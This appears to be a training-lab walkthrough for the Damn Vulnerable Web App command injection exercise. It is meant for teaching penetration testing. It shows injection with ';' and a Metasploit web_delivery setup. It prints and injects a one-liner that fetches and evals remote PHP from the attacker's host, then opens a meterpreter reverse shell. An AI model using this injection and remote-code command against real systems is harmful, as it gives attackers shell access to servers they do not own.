---
title: Command Injection
description: Damn Vulnerable Web App - Command Injection
extends: _layouts.documentation
section: content
---

# Command Injection

1\. Navigate to the command injection lesson and enter the IP address of your Kali Linux instance.

The page result looks like it might just be running the `ping <ip you enetered>` on the server, and then just copying the output into the web page. 

<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/command-injection/2-ping.PNG">

2\. Let's test this theory by submitting `165.227.62.246; pwd` into the web form.

<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/command-injection/3-pwd.PNG">

3\. Looks like the web page shows the output from both the `ping` and the `pwd` command.
That confirms it, this form has a command injection vulnerability!

Let's break down how we know this:

1. We guessed that the site is just running `ping <ip you entered>` on the server based on the format of the output.
2. We tested this theory by submitting `165.227.62.246; pwd` to the form. (replace `165.227.62.246` with the IP address of you Kali Linux instance.)
3. When the server  substitutes `165.227.62.246; pwd` for `<ip you entered>` you get a chained command `ping 165.227.62.246; pwd`
4. The `;` we added to our IP address tells the server that the ping command is done, and now we're starting a new command (`pwd`).
5. The web page returned the output we expected (the output from both commands). 
6. Which means our theory is correct!

We now know we can use use the `;` operator to chain any command we want onto the original ping command.

4\. Lets take advantage of this command injection vulnerability.
Login to your Kali Linux instance and start up metasploit. 
Refer to the [Quickstart Guide](/walkthroughs/damn-vulnerable-web-app/quickstart) if you forgot how to do this.

Once you're in your metasploit console, use the `use exploit/multi/script/web_delivery` auxiliary module.
This module will allow us to exploit the command injection vulnerability we just found.

```bash
# select the web_delivery module
msf5 > use exploit/multi/script/web_delivery
```

You can always show what kind of options your current module supports with the `show options` command.
```bash
msf5 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python
```

You can also show what targets your current module supports with the `show targets` command.
```bash
msf5 exploit(multi/script/web_delivery) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   PSH (Binary)
```

Let's start by setting some options
```bash
# we know the web server uses PHP
msf5 exploit(multi/script/web_delivery) > set target 1
target => 1

# replace 165.227.62.246 with the IP address of your Kali Linux instance
msf5 exploit(multi/script/web_delivery) > set LHOST 165.227.62.246
LHOST => 165.227.62.246

# thehackerlab.co set's up Kali Linux instances with open ports at 9990-9999
# replace 9990 with an open port if you're using a manual setup
msf5 exploit(multi/script/web_delivery) > set SRVPORT 9990
SRVPORT => 9990

# thehackerlab.co set's up Kali Linux instances with open ports at 9990-9999
# replace 9991 with an open port if you're using a manual setup
msf5 exploit(multi/script/web_delivery) > set lPORT 9991
lPORT => 9991

# we want to setup a meterpreter shell on the target server
msf5 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
```

>Hint: Checkout the official documentation for the [web delivery](https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery) module to learn more about what options are available, or how they work.
>You can also checkout the official documentation for the [php/metperpreter/reverse_tcp](https://www.rapid7.com/db/modules/payload/php/meterpreter/reverse_tcp) payload, or [working with payloads](https://metasploit.help.rapid7.com/docs/working-with-payloads) in general.

This is what everything should look like if you've set all the options correctly.
```
msf5 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  9990             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  165.227.62.246   yes       The listen address (an interface may be specified)
   LPORT  9991             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   PHP
```

Now run the exploit.
```bash
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 165.227.62.246:9992:-  -
[*] Started reverse TCP handler on 0.0.0.0:9992
[*] Using URL: http://0.0.0.0:9990/28rrQym9drJ
[*] Local IP: http://172.19.0.2:9990/28rrQym9drJ
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://165.227.62.246:9990/28rrQym9drJ'));"
```

5\. The exploit generates a PHP command that, when run on the target server, will create a meterpreter shell you can use to interact with the target server.
In this case the full generated command is:

```bash
php -d allow_url_fopen=true -r "eval(file_get_contents('http://165.227.62.246:9990/28rrQym9drJ'));"
```

Recall that we can take advantage of a command injection flaw to run any command we want on the target web server by using the `;` operator to chain commands together.

```bash
<ip address>; <any command we want to run>
```

So let's substitute our exploit command in for `<any command we want to run>`

```bash
# replace 165.227.62.246 with the IP address of your Kali Linux instance.
165.227.62.246; php -d allow_url_fopen=true -r "eval(file_get_contents('http://165.227.62.246:9990/28rrQym9drJ'));"`
```

<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/command-injection/4-run.PNG">

6\. The previous step will attempt to run a script on the web server that will connect back to your Kali instance.
If it's successful you'll see something like this:
```bash
msf5 exploit(multi/script/web_delivery) > [*] 167.99.163.173   web_delivery - Delivering Payload
[*] Sending stage (38247 bytes) to 167.99.163.173
[*] Meterpreter session 1 opened (172.19.0.2:9992 -> 167.99.163.173:44950) at 2019-06-07 23:36:57 +0000
```

7\. Get a list of open sessions.
```bash
msf5 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                   Connection
  --  ----  ----                   -----------                   ----------
  1         meterpreter php/linux  www-data (33) @ c82110c8185d  172.19.0.2:9991 -> 167.99.163.173:44950 (167.99.163.173)
```

8\. Connect to your session. 
```bash
msf5 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
```

Congratulations! This is a terminal on the target machine!